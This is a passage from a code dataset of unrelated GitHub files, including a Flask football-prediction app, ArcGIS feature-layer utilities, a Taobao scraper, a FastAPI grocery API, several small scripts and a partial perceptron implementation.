file.save(os.path.join('uploads/pertandingan', filename))\n            flash(f'File {filename} berhasil diunggah.', 'success')\n\n            headers, data_rows = process_csv_file_match(\n                os.path.join('uploads/pertandingan', filename))\n\n            # Predict and evaluate the results\n            akurasi, classification_report_str = predict_and_evaluate_match(\n                os.path.join('uploads/pertandingan', filename))\n\n            # Each mapping below reads only its own column; the original inner\n            # conditions referenced the previous (already remapped) column.\n            for row in data_rows:\n                row[1] = 'Biasa' if row[1] == 0 else (\n                    'Rata-Rata' if row[1] == 1 else 'Bagus')\n                row[2] = 'Biasa' if row[2] == 0 else (\n                    'Rata-Rata' if row[2] == 1 else 'Bagus')\n                row[3] = 'Baru Melatih' if row[3] == 0 else (\n                    'Berprestasi' if row[3] == 1 else 'Berpengalaman')\n                row[4] = 'Baru Melatih' if row[4] == 0 else (\n                    'Berprestasi' if row[4] == 1 else 'Berpengalaman')\n                row[5] = 'Counter Attack' if row[5] == 0 else (\n                    'Long Ball' if row[5] == 1 else ('Build Up' if row[5] == 2 else 'Tiki-Taka'))\n                row[6] = 'Counter Attack' if row[6] == 0 else (\n                    'Long Ball' if row[6] == 1 else ('Build Up' if row[6] == 2 else 'Tiki-Taka'))\n                row[7] = 'Low Block' if row[7] == 0 else ('Man Marking' if row[7] == 1 else (\n                    'High Pressing' if row[7] == 2 else 'Offside Trap'))\n                row[8] = 'Low Block' if row[8] == 0 else ('Man Marking' if row[8] == 1 else (\n                    'High Pressing' if row[8] == 2 else 'Offside Trap'))\n\n        else:\n            flash(\n                f'File {file.filename} gagal diunggah. 
File yang diunggah harus berformat .csv.', 'error')\n headers, data_rows = [], []\n else:\n headers, data_rows = [], []\n\n return render_template('prediksi.html', headers=headers, data_rows=data_rows, akurasi=akurasi*100, classification_report_str=classification_report_str)\n\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n if request.method == 'POST':\n # Get the input data from the form\n point_akhir = request.form.get('floatingPoint')\n jumlah_gol = request.form.get('floatingGol')\n jumlah_masuk = request.form.get('floatingBobol')\n rating_tim = request.form.get('floatingRating')\n kualitas_pelatih = request.form.get('floatingPelatih')\n nama_tim = request.form.get('floatingTim')\n\n # Load the uploaded CSV file and preprocess the input data for prediction\n data_input = [[point_akhir, jumlah_gol,\n jumlah_masuk, rating_tim, kualitas_pelatih]]\n\n # # Perform the prediction using the C4.5 algorithm\n prediction_result = predict_and_evaluate(\n os.path.join('uploads/klasemen', 'premierleague.csv'), data_input)\n\n # # Convert the prediction result to the corresponding class name\n if prediction_result == 'ucl':\n kelas = 'Liga Champions (UCL)'\n elif prediction_result == 'uecl':\n kelas = 'Liga Conference (UECL)'\n elif prediction_result == 'degradasi':\n kelas = 'Degradasi'\n elif prediction_result == 'no_europe':\n kelas = 'Tidak Bermain di Turnamen Eropa'\n else:\n kelas = 'Liga Eropa (UEL)'\n\n # # Return the prediction results as JSON\n return jsonify({\n 'prediction_result': kelas,\n 'nama_tim': nama_tim,\n 'floatingPoint': point_akhir,\n 'floatingGol': jumlah_gol,\n 'floatingBobol': jumlah_masuk,\n 'floatingRating': rating_tim,\n 'floatingPelatih': kualitas_pelatih,\n })\n # return render_template('index.html', nama_tim=nama_tim, point_akhir=point_akhir, jumlah_gol=jumlah_gol, jumlah_masuk=jumlah_masuk, rating_tim=rating_tim, kualitas_pelatih=kualitas_pelatih)\n\n\n@app.route('/predict-match', methods=['POST'])\ndef predict_match():\n if request.method == 'POST':\n # Get the input data from the form\n nama_tim_home = request.form.get('floatingTimHome')\n nama_tim_away = request.form.get('floatingTimAway')\n rating_tim_home = request.form.get('floatingRatingTimHome')\n rating_tim_away = request.form.get('floatingRatingTimAway')\n kualitas_pelatih_home = request.form.get(\n 'floatingKualitasPelatihHome')\n kualitas_pelatih_away = request.form.get(\n 'floatingKualitasPelatihAway')\n menyerang_home = request.form.get('floatingMenyerangHome')\n menyerang_away = request.form.get('floatingMenyerangAway')\n bertahan_home = request.form.get('floatingBertahanHome')\n bertahan_away = request.form.get('floatingBertahanAway')\n\n # Load the uploaded CSV file and preprocess the input data for prediction\n data_input = [[rating_tim_home, rating_tim_away, kualitas_pelatih_home,\n kualitas_pelatih_away, menyerang_home, menyerang_away, bertahan_home, bertahan_away]]\n\n # # Perform the prediction using the C4.5 algorithm\n prediction_result = predict_and_evaluate_match_input(\n os.path.join('uploads/pertandingan', 'match-dataset.csv'), data_input)\n\n if prediction_result == 'kalah':\n kelas = 'Kalah'\n elif prediction_result == 'imbang':\n kelas = 'Imbang'\n else:\n kelas = 'Menang'\n\n if rating_tim_home == '0':\n rating_tim_home = 'Biasa'\n elif rating_tim_home == '1':\n rating_tim_home = 'Rata-Rata'\n else:\n rating_tim_home = 'Bagus'\n\n if rating_tim_away == '0':\n rating_tim_away = 'Biasa'\n elif rating_tim_away == '1':\n rating_tim_away = 'Rata-Rata'\n else:\n rating_tim_away 
= 'Bagus'\n\n if kualitas_pelatih_home == '0':\n kualitas_pelatih_home = 'Baru Melatih'\n elif kualitas_pelatih_home == '1':\n kualitas_pelatih_home = 'Berprestasi'\n else:\n kualitas_pelatih_home = 'Berpengalaman'\n\n if kualitas_pelatih_away == '0':\n kualitas_pelatih_away = 'Baru Melatih'\n elif kualitas_pelatih_away == '1':\n kualitas_pelatih_away = 'Berprestasi'\n else:\n kualitas_pelatih_away = 'Berpengalaman'\n\n if menyerang_home == '0':\n menyerang_home = 'Counter Attack'\n elif menyerang_home == '1':\n menyerang_home = 'Long Ball'\n elif menyerang_home == '2':\n menyerang_home = 'Build Up'\n else:\n menyerang_home = 'Tiki-Taka'\n\n if menyerang_away == '0':\n menyerang_away = 'Counter Attack'\n elif menyerang_away == '1':\n menyerang_away = 'Long Ball'\n elif menyerang_away == '2':\n menyerang_away = 'Build Up'\n else:\n menyerang_away = 'Tiki-Taka'\n\n if bertahan_home == '0':\n bertahan_home = 'Low Block'\n elif bertahan_home == '1':\n bertahan_home = 'Man Marking'\n elif bertahan_home == '2':\n bertahan_home = 'High Pressing'\n else:\n bertahan_home = 'Offside Trap'\n\n if bertahan_away == '0':\n bertahan_away = 'Low Block'\n elif bertahan_away == '1':\n bertahan_away = 'Man Marking'\n elif bertahan_away == '2':\n bertahan_away = 'High Pressing'\n else:\n bertahan_away = 'Offside Trap'\n\n # Return the prediction results as JSON\n return jsonify({\n 'prediction_result': kelas,\n 'nama_tim_home': nama_tim_home,\n 'nama_tim_away': nama_tim_away,\n 'rating_tim_home': rating_tim_home,\n 'rating_tim_away': rating_tim_away,\n 'kualitas_pelatih_home': kualitas_pelatih_home,\n 'kualitas_pelatih_away': kualitas_pelatih_away,\n 'menyerang_home': menyerang_home,\n 'menyerang_away': menyerang_away,\n 'bertahan_home': bertahan_home,\n 'bertahan_away': bertahan_away,\n })\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/prediksi')\ndef prediksi():\n return render_template('prediksi.html')\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"ricorizkya/Prediksi-Klasemen-English-Premier-League","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":13869,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"69840066669","text":"from __future__ import annotations\nimport os\nfrom typing import Union\n\nfrom arcgis.gis import GIS, Item\nfrom arcgis.features import FeatureLayer, Feature\nfrom arcgis.geometry import SpatialReference\n\n\nclass _ReachIdFeatureLayer(FeatureLayer):\n\n @classmethod\n def from_item_id(cls, gis: GIS, item_id: str) -> _ReachIdFeatureLayer:\n url = Item(gis, item_id).layers[0].url\n return cls(url, gis)\n\n @classmethod\n def from_url(cls, gis: GIS, url: str) -> _ReachIdFeatureLayer:\n return cls(url, gis)\n\n def query_by_reach_id(self, reach_id: str, spatial_reference: Union[int, dict, SpatialReference] = {'wkid': 4326}):\n return self.query(f\"reach_id = '{reach_id}'\", out_sr=spatial_reference)\n\n def flush(self) -> dict:\n \"\"\"\n Delete all data!\n :return: Response\n \"\"\"\n # get a list of all OID's\n oid_list = self.query(return_ids_only=True)['objectIds']\n\n # if there are features\n if len(oid_list):\n # convert the list to a comma separated string\n oid_deletes = ','.join([str(v) for v in oid_list])\n\n # delete all the features using the OID string\n return self.edit_features(deletes=oid_deletes)\n\n def update(self, reach):\n\n # get oid of records matching reach_id\n oid_lst = self.query(f\"reach_id = 
'{reach.reach_id}'\", return_ids_only=True)['objectIds']\n\n # if a feature already exists - hopefully the case, get the oid, add it to the feature, and push it\n if len(oid_lst) > 0:\n\n # check the geometry type of the target feature service - point or line\n if self.properties.geometryType == 'esriGeometryPoint':\n update_feat = reach.as_centroid_feature\n\n elif self.properties.geometryType == 'esriGeometryPolyline':\n update_feat = reach.as_feature\n\n update_feat.attributes['OBJECTID'] = oid_lst[0]\n resp = self.edit_features(updates=[update_feat])\n\n # if the feature does not exist, add it\n else:\n resp = self.add_reach(reach)\n\n return resp\n\n def update_attributes_only(self, reach):\n\n # get oid of records matching reach_id\n oid_lst = self.query(f\"reach_id = '{reach.reach_id}'\", return_ids_only=True)['objectIds']\n\n # if a feature already exists - hopefully the case, get the oid, add it to the feature, and push it\n if len(oid_lst) > 0:\n\n # check the geometry type of the target feature service - point or line\n if self.properties.geometryType == 'esriGeometryPoint':\n update_feat = reach.as_centroid_feature\n\n elif self.properties.geometryType == 'esriGeometryPolyline':\n update_feat = reach.as_feature\n\n # remove any of the geographic properties from the feature\n for attr in ['extent']:\n del (update_feat.attributes[attr])\n update_feat = Feature(attributes=update_feat.attributes) # gets rid of geometry\n\n update_feat.attributes['OBJECTID'] = oid_lst[0]\n\n # push the update\n resp = self.edit_features(updates=[update_feat])\n\n return resp\n\n else:\n\n return False\n\n def update_stage(self, reach):\n\n # get oid of records matching reach_id\n oid_lst = self.query(f\"reach_id = '{reach.reach_id}'\", return_ids_only=True)['objectIds']\n\n # if a feature already exists - hopefully the case, get the oid, add it to the feature, and push it\n if len(oid_lst) > 0:\n\n # check the geometry type of the target feature service - point or line\n if self.properties.geometryType == 'esriGeometryPoint':\n update_feat = reach.as_centroid_feature\n\n elif self.properties.geometryType == 'esriGeometryPolyline':\n update_feat = reach.as_feature\n\n # remove properties not needed, which is most of them\n update_keys = ['gauge_runnable', 'gauge_stage', 'gauge_observation']\n attrs = {k: update_feat.attributes[k] for k in update_feat.attributes.keys() if k in update_keys}\n\n # create new feature without geometry and only needed attributes\n update_feat = Feature(attributes=attrs)\n\n # tack on the object id retrieved initally\n update_feat.attributes['OBJECTID'] = oid_lst[0]\n\n # push the update\n resp = self.edit_features(updates=[update_feat])\n\n return resp\n\n else:\n\n return False\n\n\nclass ReachPointFeatureLayer(_ReachIdFeatureLayer):\n\n def add_reach(self, reach):\n \"\"\"\n Push new reach points to the reach point feature service in bulk.\n :param reach: Reach - Required\n Reach object being pushed to feature service.\n :return: Dictionary response from edit features method.\n \"\"\"\n from .reach import Reach\n\n # check for correct object type\n if type(reach) != Reach:\n raise Exception('Reach to add must be a Reach object instance.')\n\n # TODO: Ensure reach does not already exist\n return self.edit_features(adds=reach.reach_points_as_features)\n\n def _add_reach_point(self, reach_point):\n # add a new reach point to ArcGIS Online\n resp = self.update(adds=[reach_point.as_feature])\n\n # TODO: handle the response\n return None\n\n def update_putin_or_takeout(self, 
access):\n access_resp = self.query(\n f\"reach_id = '{access.reach_id}' AND point_type = 'access' AND subtype = '{access.subtype}'\",\n return_ids_only=True)['objectIds']\n if len(access_resp):\n oid_access = access_resp[0]\n access_feature = access.as_feature\n access_feature.attributes['OBJECTID'] = oid_access\n return self.edit_features(updates=[access_feature])\n else:\n return self.edit_features(adds=[access.as_feature])\n\n def update_putin(self, access):\n if not access.subtype == 'putin':\n raise Exception('A put-in access point must be provided to update the put-in.')\n return self.update_putin_or_takeout(access)\n\n def update_takeout(self, access):\n if not access.subtype == 'takeout':\n raise Exception('A take-out access point must be provided to update the take-out.')\n return self.update_putin_or_takeout(access)\n\n def _create_reach_point_from_series(self, reach_point):\n from .reach import ReachPoint\n\n # create an access object instance with the required parameters\n access = ReachPoint(reach_point['reach_id'], reach_point['_geometry'], reach_point['type'])\n\n # for the remainder of the fields from the service, populate if matching key in access object\n for key in [val for val in reach_point.keys() if val not in ['reach_id', '_geometry', 'type']]:\n if key in access.keys():\n access[key] = reach_point[key]\n\n return access\n\n def get_putin(self, reach_id):\n\n # get a pandas series from the feature service representing the putin access\n sdf = self.get_putin_sdf(reach_id)\n putin_series = sdf.iloc[0]\n return self._create_reach_point_from_series(putin_series)\n\n def get_takeout(self, reach_id):\n\n # get a pandas series from the feature service representing the putin access\n sdf = self.get_takeout_sdf(reach_id)\n takeout_series = sdf.iloc[0]\n return self._create_reach_point_from_series(takeout_series)\n\n\nclass ReachLineFeatureLayer(_ReachIdFeatureLayer):\n\n def query_by_river_name(self, river_name_search):\n field_name = 'name_river'\n where_list = [\"{} LIKE '%{}%'\".format(field_name, name_part) for name_part in river_name_search.split()]\n where_clause = ' AND '.join(where_list)\n return self.query(where_clause).df\n\n def query_by_section_name(self, section_name_search):\n field_name = 'name_section'\n where_list = [\"{} LIKE '%{}%'\".format(field_name, name_part) for name_part in section_name_search.split()]\n where_clause = ' AND '.join(where_list)\n return self.query(where_clause).df\n\n def add_reach(self, reach):\n \"\"\"\n Push reach to feature service.\n :param reach: Reach - Required\n Reach object being pushed to feature service.\n :return: Dictionary response from edit features method.\n \"\"\"\n from .reach import Reach\n\n # check for correct object type\n if type(reach) != Reach:\n raise Exception('Reach to add must be a Reach object instance.')\n\n # check the geometry type of the target feature service - point or line\n if self.properties.geometryType == 'esriGeometryPoint':\n point_feature = reach.as_centroid_feature\n resp = self.edit_features(adds=[point_feature])\n\n elif self.properties.geometryType == 'esriGeometryPolyline':\n line_feature = reach.as_feature\n resp = self.edit_features(adds=[line_feature])\n\n else:\n raise Exception('The feature service geometry type must be either point or polyline.')\n\n return resp\n\n\ndef update_stage(reach_id, line_lyr_id=os.getenv('REACH_LINE_ID'), centroid_lyr_id=os.getenv('REACH_CENTROID_ID')):\n \"\"\"\n Update the reach stage by the id.\n :param reach_id: Reach ID uniquely identifying the 
reach\n :return: Boolean success or failure.\n \"\"\"\n from .reach import Reach\n reach = Reach.get_from_aw(reach_id)\n for lyr_id in [line_lyr_id, centroid_lyr_id]:\n lyr = ReachFeatureLayer.from_item_id(lyr_id)\n lyr.update_reach_attributes_only(reach)","repo_name":"knu2xs/water-reach-tools","sub_path":"src/water_reach_tools/feature_layers.py","file_name":"feature_layers.py","file_ext":"py","file_size_in_byte":9713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39202624516","text":"import socket\n\nHEADER = 64\nPORT = 5050\nFORMAT = 'utf-8'\nDISCONNECT_MESSAGE = \"disconnect\"\nSERVER = socket.gethostbyname(socket.gethostname())\nADDR = (SERVER, PORT)\n\nclient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclient.connect(ADDR)\n\n\n\ndef rec(msg):\n received = str(client.recv(2048).decode(FORMAT))\n print(received)\ndef send(msg):\n message = msg.encode(FORMAT)\n msg_length = len(message)\n send_length = str(msg_length).encode(FORMAT)\n #here we buffer the string sent with blank spaces to be the correct size of the header\n send_length += b' ' * (HEADER - len(send_length))\n #sending length and message\n client.send(send_length)\n client.send(message)\n\n\n\n\nA = \"\"\n\n\ncount = 0\n\n#this will just give us the opening dialogue with the user\nwhile A != \"disconnect\":\n send(\"testing\")\n received = client.recv(2048).decode(FORMAT)\n print(received)\n if \"?\" in received:\n msg = input(\"\\n\")\n send(msg)\n","repo_name":"doncrowley/CSC594","sub_path":"AgentClientProject.py","file_name":"AgentClientProject.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18685217011","text":"import sys\n\nfrom selenium import webdriver\nimport time\nfrom lxml import etree\nfrom pymongo import MongoClient\n\nclient = MongoClient('127.0.0.1', 27017)\ndb = client['tb_db']\ncollection = db.get_collection('taobao')\n\n\ndef get_data(url, page):\n page += 1\n driver.get(url)\n driver.implicitly_wait(10)\n html = etree.HTML(driver.page_source)\n # with open('hello.html', 'w', encoding='utf-8') as f:\n # f.write(driver.page_source)\n # print(html)\n infos = html.xpath('//div[@class=\"item J_MouserOnverReq \"]|//div[@class=\"item J_MouserOnverReq item-ad \"]')\n for info in infos:\n detail = info.xpath('.//div[@class=\"pic\"]/a/img/@alt')[0]\n price = info.xpath('div[2]/div[1]/div[1]/strong/text()')[0]\n sell = info.xpath('div[2]/div[1]/div[@class=\"deal-cnt\"]/text()')[0]\n shop = info.xpath('div[2]/div[3]/div[@class=\"shop\"]/a/span[2]/text()')[0]\n city = info.xpath('div[2]/div[3]/div[@class=\"location\"]/text()')[0]\n # print(detail, price, sell, shop, city)\n # print('='*30)\n data = {\n 'detail': detail,\n 'price': price,\n 'sell': sell,\n 'shop': shop,\n 'city': city\n }\n collection.insert(data)\n if page <= 50:\n next_page(driver.current_url, page)\n else:\n sys.exit()\n\n\ndef next_page(url, page):\n driver.get(url)\n driver.implicitly_wait(10)\n driver.find_element_by_xpath('.//a[@class=\"J_Ajax num icon-tag\"]').click()\n time.sleep(3)\n get_data(driver.current_url, page)\n\n\nif __name__ == '__main__':\n url = 'https://www.taobao.com'\n driver = webdriver.Chrome()\n driver.implicitly_wait(20)\n driver.get(url)\n driver.find_element_by_id('q').clear()\n driver.find_element_by_id('q').send_keys('台式电脑')\n driver.find_element_by_class_name('btn-search').click()\n # print(driver.page_source)\n # 
driver.current_url gets the URL of the current page\n    get_data(driver.current_url, 1)  # 1 means start from the first page\n","repo_name":"jiyabing/learning","sub_path":"开班笔记/个人项目/taobao/taobao.py","file_name":"taobao.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"71942227948","text":"import dash\nimport dash_table\n# import dash_core_components as dcc\nimport dash_html_components as html\nimport pandas as pd\n\n# url = 'https://raw.githubusercontent.com/plotly/datasets/master/solar.csv'\ndata = 'cubs-2016-baseball.csv'\ndf = pd.read_csv(data)\n\napp = dash.Dash(__name__)\n\nhidden_cols=['OBP','SLG','OPS','OPS+','TB','GDP','HBP','SH','SF','IBB']\n# all_cols = df.columns\nvisible_cols =['Rk','Pos','Name','Age','G','PA','AB','R','H','2B','3B','HR','RBI','SB','CS','BB','SO','BA']\n\n# visible_cols = list(set(all_cols) - set(hidden_cols))\n\napp.layout = html.Div([\n    dash_table.DataTable(\n        id='table',\n        # columns=[{\"name\": i, \"id\": i} for i in df.columns],\n        columns=[{\"name\": i, \"id\": i} for i in visible_cols] +\n        [{\"name\": i, \"id\": i, 'hideable': True} for i in hidden_cols],\n        hidden_columns=hidden_cols,\n        data=df.to_dict('records'),\n        filter_action=\"native\",\n        sort_action=\"native\",\n        # sort_mode=\"multi\",\n        # hidden_columns=['OBP','SLG','OPS','OPS+','TB','GDP','HBP','SH','SF','IBB'],\n        # page_action='native',\n        # page_current= 0,\n        # page_size= 10,\n\n        style_header={'backgroundColor': 'rgb(230, 230, 230)',\n                      'fontWeight': 'bold'},\n        style_data_conditional=[\n            {\n                'if': {\n                    'row_index': 'odd'\n                },\n                'backgroundColor': 'rgb(248, 248, 248)'\n            },\n        ],\n        style_table={'overflowX': 'scroll'},\n    ), # end datatable\n\n    # Download Button\n    html.Div([\n        html.A(html.Button('Download Data', id='download-button'), id='download-link')\n    ]),\n])\n\nif __name__ == '__main__':\n    app.run_server(debug=True)\n","repo_name":"darrenhusa/dash_datatable_export_test","sub_path":"app-ver1.py","file_name":"app-ver1.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"32379259132","text":"from openupgradelib import openupgrade\n\n\n@openupgrade.migrate()\ndef migrate(env, version):\n    openupgrade.logged_query(\n        env.cr,\n        \"\"\"\n        UPDATE account_move am\n        SET sii_description = COALESCE(ai.sii_manual_description, ai.sii_description),\n            sii_state = ai.sii_state,\n            sii_csv = ai.sii_csv,\n            sii_return = ai.sii_return,\n            sii_header_sent = ai.sii_header_sent,\n            sii_content_sent = ai.sii_content_sent,\n            sii_send_error = ai.sii_send_error,\n            sii_send_failed = ai.sii_send_failed,\n            sii_refund_type = ai.sii_refund_type,\n            sii_refund_specific_invoice_type = ai.sii_refund_specific_invoice_type,\n            sii_account_registration_date = ai.sii_account_registration_date,\n            sii_registration_key = ai.sii_registration_key,\n            sii_registration_key_additional1 = ai.sii_registration_key_additional1,\n            sii_registration_key_additional2 = ai.sii_registration_key_additional2,\n            sii_property_location = ai.sii_property_location,\n            sii_property_cadastrial_code = ai.sii_property_cadastrial_code\n        FROM account_invoice ai\n        WHERE ai.id = am.old_invoice_id\"\"\",\n    )\n    openupgrade.logged_query(\n        env.cr,\n        \"\"\"\n        INSERT INTO account_move_queue_job_rel\n        (invoice_id, job_id)\n        SELECT am.id, rel.job_id\n        FROM account_invoice_validation_job_rel rel\n        JOIN account_move am ON am.old_invoice_id = rel.invoice_id\n        \"\"\",\n    
)\n","repo_name":"PlanetaTIC/l10n-spain","sub_path":"l10n_es_aeat_sii_oca/migrations/13.0.1.0.0/post-migration.py","file_name":"post-migration.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"14435829396","text":"#!/usr/bin/env python3\n# Monitors if the TOF and MCP datastreams are alive\n# Stephan Kuschel, Matt Ware, Catherine Saladrigas, 2019\n\nimport numpy as np\nimport pyqtgraph as pg\nimport sqs_nqs_tools.online as online \nimport time\n\n_daqaliveplot = pg.image(title='DAQ alive: Green good, red bad')\nCLRS = ['r','g']\ncmap = pg.ColorMap(np.array([0.,1.]), np.array([pg.colorTuple(pg.Color(c)) for c in CLRS ]) )\n_daqaliveplot.setColorMap( cmap )\ndef plotdaqalive(status):\n '''\n Plots red/green image depending on value of status\n Input:\n ds\n Output:\n None, updates plot window\n '''\n im = np.ones((3,3))*float(status)\n _daqaliveplot.setImage( im, autoLevels=False )\n pg.QtGui.QApplication.processEvents()\n\ndef isAlive(ds):\n # Attempt to get the detector\n try:\n online.getSomeDetector(ds, spec0='SQS_DPU_LIC/CAM/YAG_UPSTR:daqOutput', spec1='data.image.pixels')\n #online.getSomeDetector(ds, spec0='SQS_DPU_LIC/CAM/YAG_UPSTR:output', spec1='data.image.data')\n except Exception as exc:\n print(str(exc))\n print('MCP DATA SOURCE CHANGED!!!')\n print('MCP DATA SOURCE CHANGED!!!')\n print('MCP DATA SOURCE CHANGED!!!')\n return False\n\n # Attempt to get the TOF\n try:\n online.getSomeDetector(ds, spec0='SQS_DIGITIZER_UTC1/ADC/1:network', spec1='digitizers.channel_1_A.raw.samples')\n except Exception as exc:\n print('TOF DATA SOURCE CHANGED!!!')\n print('TOF DATA SOURCE CHANGED!!!')\n print('TOF DATA SOURCE CHANGED!!!')\n return False\n\n # If both succeed return true\n return True\n\ndef main(source):\n '''\n Iterate over the datastream served by source\n Input:\n source: ip address as string\n Output:\n none, updates plots\n '''\n for i, ds in enumerate((online.servedata(source))):\n plotdaqalive( isAlive(ds) )\n\nif __name__=='__main__':\n # Start main function\n main(online.parseSource())\n\n\n\n\n\n\n\n\n","repo_name":"skuschel/XFEL_SQS_NQS_Tools","sub_path":"scripts/daqalive.py","file_name":"daqalive.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"20001547089","text":"# Написать функцию принимающая на вход неопределенным количеством аргументов\r\n# и именованный аргумент mean_type.\r\n# В зависимости от mean_type вернуть\r\n# среднеарифметическое либо среднегеометрическое.\r\n# Написать программу в виде трех функций.\r\n\r\n\r\ndef geometr(args):\r\n geom = 1\r\n for i in args:\r\n geom *= i ** (1 / len(args))\r\n return geom\r\n\r\n\r\ndef average(args):\r\n summ = 0\r\n for i in args:\r\n summ += i\r\n aver = summ / (len(args))\r\n return aver\r\n\r\n\r\ndef numbers_operation(*args, **kwargs):\r\n for key, value in kwargs.items():\r\n k = value\r\n if k == 'average':\r\n print(average(args))\r\n elif k == 'geometr':\r\n print(geometr(args))\r\n\r\n\r\n\r\n\r\n\r\n\r\nnumbers_operation(5, 8, 55, 67, 8, 2, 3, mean_type='geometr')\r\n","repo_name":"macson777/test_repo","sub_path":"src/task_8_1.py","file_name":"task_8_1.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28358680282","text":"from fastapi import FastAPI, Depends, HTTPException\nfrom pydantic import BaseModel 
\n\nfrom fastapi.middleware.cors import CORSMiddleware\nimport requests \n\nfrom dotenv import load_dotenv\nimport os \n\nload_dotenv()\n\napp = FastAPI()\n\norigins = [\n \"http://localhost:3000\", # frontend endpoint\n]\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"POST\",\"GET\",],\n allow_headers=[\"*\"],\n)\n\nclass Food(BaseModel):\n id:str\n name:str\n\ngrocery_list = [\n {\"id\":\"001\",\"name\":\"oranges\"},\n {\"id\":\"002\",\"name\":\"bread\"}\n]\n\n## Endpoints\n@app.get(\"/\")\nasync def welcome():\n return \"Who's Hungry!\"\n\n@app.get(\"/groceries\")\nasync def get_groceries_list():\n return grocery_list\n\n@app.post('/add')\nasync def add_item(item:Food):\n grocery_list.append(item)\n return \"Added \" + item.name\n\n@app.get('/recipes')\nasync def find_recipes(item:str): \n result = []\n response = find_by_ingredients(item)\n\n for recipes in response:\n recipe = {}\n recipe[\"title\"] = recipes[\"title\"]\n recipe[\"image\"] = recipes[\"image\"]\n result.append(recipe)\n return result\n\n\ndef find_by_ingredients(ingredients):\n url= 'https://api.spoonacular.com/recipes/findByIngredients'\n headers = {\n 'Content-Type':'application/json',\n 'x-api-key':os.getenv('SPOONACULAR_API_KEY') }\n parameters ={\n 'ingredients': ingredients}\n\n response = requests.get(url, headers=headers, params=parameters)\n\n if (response.status_code == 200):\n print(\"The request was a success!\")\n\n elif (response.status_code == 404):\n print(\"Result not found!\")\n\n return response.json()\n","repo_name":"granthill7/Grocery-Store-Demo","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9335449607","text":"import numpy as np\n\n\nclass Error(Exception):\n \"\"\"Base class for exceptions in this module.\"\"\"\n pass\n\n\nclass NoFitError(Error):\n \"\"\"Exception raised for errors in the input.\n\n Attributes:\n expression -- input expression in which the error occurred\n message -- explanation of the error\n \"\"\"\n\n def __init__(self, expression, message):\n self.expression = expression\n self.message = message\n\n\nclass Perceptron:\n def __init__(self, dataset, weight_random_seed=[-0.5, 0.5], bias=-1, degree=0, learn_tax=0.1, split=\"without\"):\n self.__dataset = dataset\n self.__learn_tax = learn_tax\n self.__degree = degree\n self.__bias = bias\n self.__x_training, self.__y_training, self.__x_test, self.__y_test = self.generate_train_test_dataset(split)\n self.__weights = self.generate_weights(weight_random_seed)\n self.__fit = False\n self.__number_of_weights_adjust = 0\n self.__number_of_epochs = 0\n\n def fit(self):\n epoch = 1\n error = True\n number_of_rows = self.__x_training.shape[0]\n number_of_weights_adjust = 0\n while(error):\n print(\"------ Epoch {} ------\".format(epoch))\n epoch += 1\n erros_count = 0\n\n for index in range(number_of_rows):\n x_enter = np.insert(self.__x_training[index], 0, self.__bias)\n u = (x_enter * self.__weights).sum()\n\n result = self.activation_function(u)\n expected_result = self.__y_training[index]\n\n if(result != expected_result):\n erros_count += 1\n number_of_weights_adjust += 1\n self.__weights = self.adjust_weights(\n x_enter, result, expected_result)\n print(\"### Weights {}\".format(self.__weights))\n\n print(\"### Weights Adjust {}\".format(number_of_weights_adjust))\n\n if(erros_count == 0):\n 
self.__number_of_weights_adjust = number_of_weights_adjust\n                self.__number_of_epochs = epoch\n                error = False\n\n        print('{0} \\nTotal Weights\\' adjust={1}'.format(\n            '-' * 30, number_of_weights_adjust))\n        self.__fit = True\n\n    def fit2(self,epoch):\n        cont = 0\n        number_of_rows = self.__x_training.shape[0]\n        number_of_weights_adjust = 0\n\n        for cont in range(epoch):\n            print(\"------ Epoch {} ------\".format(cont+1))\n            for index in range(number_of_rows):\n                x_enter = np.insert(self.__x_training[index], 0, self.__bias)\n                u = (x_enter * self.__weights).sum()\n\n                result = self.activation_function(u)\n                expected_result = self.__y_training[index]\n\n                if(result != expected_result):\n                    number_of_weights_adjust += 1\n                    self.__weights = self.adjust_weights(\n                        x_enter, result, expected_result)\n                    print(\"### Weights {}\".format(self.__weights))\n            print(\"### Weights Adjust {}\".format(number_of_weights_adjust))\n        \n        self.__number_of_weights_adjust = number_of_weights_adjust\n        self.__number_of_epochs = epoch\n        self.__fit = True\n\n    def predict(self):\n        number_of_rows = self.__x_test.shape[0]\n        results = np.array([], int)  # np.int was removed from NumPy; use the builtin int\n        for index in range(number_of_rows):\n            x_enter = np.insert(self.__x_test[index], 0, self.__bias)\n            u = (x_enter * self.__weights).sum()\n            results = np.append(results, self.activation_function(u)) \n\n        return results\n\n    def get_confusion_matrix(self, reais, preditos, labels):\n        # not implemented for more than two classes\n        if len(labels) > 2:\n            return None\n\n        if len(reais) != len(preditos):\n            return None\n        \n        # treat the first class as positive and the second as negative\n        true_class = labels[0]\n        negative_class = labels[1]\n\n        # correctly predicted values\n        tp = 0\n        tn = 0\n        \n        # incorrectly predicted values\n        fp = 0\n        fn = 0\n        \n        for (indice, v_real) in enumerate(reais):\n        